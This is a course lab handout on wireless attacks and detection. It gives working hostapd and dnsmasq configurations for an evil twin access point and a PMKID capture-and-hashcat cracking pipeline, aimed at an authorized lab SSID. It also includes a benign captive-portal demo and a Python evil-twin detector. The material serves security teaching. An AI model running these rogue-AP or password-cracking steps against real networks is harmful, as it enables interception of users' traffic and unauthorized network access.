
WIR-101 Lab 5 — Evil Twin Deployment + PMKID Attack (Combined)


Prerequisites: Weeks 4-5 lectures; hcxdumptool + hostapd + dnsmasq installed; authorized lab environment
Duration: ~90 min
Points: 100


Authorization

  • Lab Authorization Form signed
  • Evil twin target SSID: VCA-WIR101-LAB (authorized clone only)
  • PMKID capture target: VCA-WIR101-LAB (authorized)
  • No production SSIDs to be cloned; no captive portals harvesting real credentials
  • All test credentials used in this lab are fictional (provided below)

Objective

Deploy an evil twin AP targeting the authorized lab network. Understand how clients can be attracted to the rogue AP via signal strength. Separately, run a PMKID attack against the authorized lab AP and document the full toolchain.

This lab combines two exercises because both are rooted in Week 5 content (rogue AP threats), and the PMKID attack from Week 4 leads naturally into its evil-twin application.


Part A — Evil Twin Setup with hostapd (35 min)

Configure hostapd

Create /tmp/evil_twin.conf:

# /tmp/evil_twin.conf
interface=wlan1
driver=nl80211
ssid=VCA-WIR101-LAB
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0

Note: wlan1 must be a second wireless interface (not the same Alfa NIC used for monitor mode). If you only have one wireless NIC, use the instructor's provided second NIC or complete this in virtual mode (see Virtual Path below).

Configure dnsmasq (DHCP)

Create /tmp/dnsmasq_evil.conf:

interface=wlan1
dhcp-range=192.168.50.100,192.168.50.200,12h
dhcp-option=3,192.168.50.1
dhcp-option=6,192.168.50.1
server=8.8.8.8

Launch

# Assign IP to the wlan1 AP interface
sudo ip addr add 192.168.50.1/24 dev wlan1

# Start AP
sudo hostapd /tmp/evil_twin.conf &

# Start DHCP
sudo dnsmasq -C /tmp/dnsmasq_evil.conf --no-daemon &

Verify

Use a second machine or phone (with production Wi-Fi disabled) to scan for the evil twin SSID. It should appear as "VCA-WIR101-LAB" alongside the legitimate AP.

In airodump-ng from a third terminal in monitor mode (if you have a third interface -- otherwise verify via wireless scan):

sudo airodump-ng wlan0mon

You should see two entries for VCA-WIR101-LAB: the legitimate AP at its original BSSID, and your evil twin at your wlan1 MAC.

Deliverable A

  1. Screenshot of airodump-ng showing two BSSIDs for the same SSID
  2. Answers: (a) Why do both APs appear in the scan? (b) How would a client choose which one to connect to? (c) What would you do to maximize the chance clients connect to your evil twin instead of the legitimate AP?

Part B — Optional: Captive Portal Concept (10 min)

This section is concept-only. You will not deploy a credential-harvesting captive portal (that would collect real user credentials, even in a lab, which raises ethical concerns beyond this exercise).

Instead, create a simple HTML page that demonstrates the phishing concept:

# Create a benign "lab demonstration" captive portal page
mkdir -p /tmp/captive_demo
cat > /tmp/captive_demo/index.html <<'EOF'
<html><body>
<h2>LAB DEMONSTRATION ONLY</h2>
<p>In a real evil twin attack, this page would mimic the target organization's login page.</p>
<p>A user submitting credentials here would deliver them to the attacker.</p>
<p>This page is for educational demonstration only. No credentials are collected.</p>
</body></html>
EOF

# Serve it on port 8080
python3 -m http.server 8080 -d /tmp/captive_demo &

Connect your own test device to the evil twin AP. Navigate to http://192.168.50.1:8080 in a browser. Observe the page.

Deliverable B

1 paragraph: explain the captive portal attack mechanism without deploying the actual phishing version. What would a real attacker's portal look like? How would they redirect HTTP traffic to it? Why does this bypass TLS?


Part C — Evil Twin Detection (10 min)

Switch back to the monitoring perspective. If an enterprise WIDS were watching:

# In airodump-ng, observe the two BSSIDs for the same SSID
# Record: different BSSIDs, possibly different channels, different signal levels

In a Wireshark capture from a monitoring interface:

  • Filter wlan.ssid == "VCA-WIR101-LAB" and observe Beacon frames from two different BSSIDs
  • The OUI (first three octets) of each BSSID identifies the vendor; mismatched OUIs for the same SSID are a Kismet alert trigger
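A detection-side script, added here as an example (not part of the original lab materials), that applies the same checks a WIDS would: it walks beacon observations, compares each BSSID advertising an SSID against a known-good inventory, and flags unknown BSSIDs, OUI mismatches and a stronger-than-legitimate signal. The beacon records, BSSIDs, OUIs and RSSI values are constructed for the example.

```python
from collections import defaultdict

# Constructed beacon observations (not real captures): (bssid, ssid, channel, rssi_dBm).
BEACONS = [
    ("A4:5E:60:11:22:33", "VCA-WIR101-LAB", 6, -48),
    ("A4:5E:60:11:22:33", "VCA-WIR101-LAB", 6, -50),
    ("00:C0:CA:AA:BB:CC", "VCA-WIR101-LAB", 6, -35),  # louder, different OUI (constructed)
    ("A4:5E:60:11:22:34", "VCA-Guest", 11, -60),
]

# The sensor's known-good inventory: SSID -> authorized BSSIDs (constructed values).
AUTHORIZED = {
    "VCA-WIR101-LAB": {"a4:5e:60:11:22:33"},
    "VCA-Guest": {"a4:5e:60:11:22:34"},
}

def oui(bssid):
    """First three octets of a MAC address, i.e. the vendor OUI."""
    return bssid.lower()[:8]

def find_evil_twins(beacons, authorized):
    """Return one alert per BSSID that beacons an SSID it is not authorized for."""
    seen = defaultdict(dict)  # ssid -> bssid -> {"channel", "rssi_max"}
    for bssid, ssid, channel, rssi in beacons:
        rec = seen[ssid].setdefault(bssid.lower(), {"channel": channel, "rssi_max": rssi})
        rec["rssi_max"] = max(rec["rssi_max"], rssi)
    alerts = []
    for ssid, bssids in seen.items():
        known = {b.lower() for b in authorized.get(ssid, set())}
        known_ouis = {oui(b) for b in known}
        legit_rssi = [r["rssi_max"] for b, r in bssids.items() if b in known]
        for bssid, rec in bssids.items():
            if bssid in known:
                continue
            reasons = ["BSSID not in authorized list for this SSID"]
            if oui(bssid) not in known_ouis:
                reasons.append("OUI differs from every authorized AP")
            if legit_rssi and rec["rssi_max"] > max(legit_rssi):
                reasons.append("stronger signal than legitimate AP")
            alerts.append({"ssid": ssid, "bssid": bssid,
                           "channel": rec["channel"], "reasons": reasons})
    return alerts

if __name__ == "__main__":
    for a in find_evil_twins(BEACONS, AUTHORIZED):
        print(f"ALERT {a['ssid']} {a['bssid']} ch{a['channel']}: {'; '.join(a['reasons'])}")
```

Note that a second BSSID sharing the authorized OUI is still flagged if it is absent from the inventory, so a legitimate multi-AP ESS must have every BSSID listed to stay quiet.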

Deliverable C

Wireshark screenshot showing Beacon frames from two BSSIDs for the same SSID + explanation of the detection mechanism.


Part D — PMKID Attack Review (20 min)

Run the PMKID attack against the authorized lab AP (same procedure as Lab 4, Part B). This time focus on the toolchain documentation rather than the mechanics.

sudo hcxdumptool -i wlan0mon -o lab5_pmkid.pcapng --enable_status=1
# Wait 2 min, Ctrl+C
hcxpcapngtool -o lab5_hash.22000 lab5_pmkid.pcapng
hashcat -m 22000 lab5_hash.22000 lab4_wordlist.txt

Document the following for each tool:

  • Command used (with flags)
  • What the tool does at each step
  • What format the data is in at the end of that step

Deliverable D

A "toolchain pipeline" diagram or table: input → hcxdumptool → pcapng → hcxpcapngtool → .22000 → hashcat → passphrase. For each arrow: data format, key content.


Teardown

sudo killall hostapd dnsmasq 2>/dev/null
sudo ip addr del 192.168.50.1/24 dev wlan1 2>/dev/null
sudo airmon-ng stop wlan0mon
sudo systemctl restart NetworkManager

Write-up Questions

  1. You set up an evil twin with the same SSID but a different BSSID. A client connects to your evil twin. Traffic flows through your machine. You do NOT have the WPA2-PSK passphrase. Can you read the client's traffic? Explain why or why not.
  2. You DO have the WPA2-PSK passphrase (you cracked it in Lab 4). Now can you decrypt the client's traffic while connected to your evil twin? What additional material would you need in Wireshark?
  3. WPA2-Enterprise (802.1X + RADIUS) is said to be resistant to evil twin attacks. What specific mechanism prevents the evil twin from impersonating the legitimate AP to a WPA2-Enterprise client?
  4. A mobile device running iOS 16+ uses MAC randomization per-network. Does this protect against the evil twin attack? Does it protect against the PMKID attack? Explain each.

Virtual Path

The virtual path for Parts A-C provides:

  • A narrated video walkthrough of the evil twin setup
  • A pre-captured Wireshark PCAP showing two-BSSID Beacon frames for the same SSID
  • The same analysis and write-up questions as the physical path

Part D (PMKID attack) uses the same virtual capture as Lab 4.


Submission

Zip into lab5_YOURNAME.zip:

  • deliverable_A.md + screenshot
  • deliverable_B.md
  • deliverable_C.md + Wireshark screenshot
  • deliverable_D.md (toolchain diagram)
  • writeup.md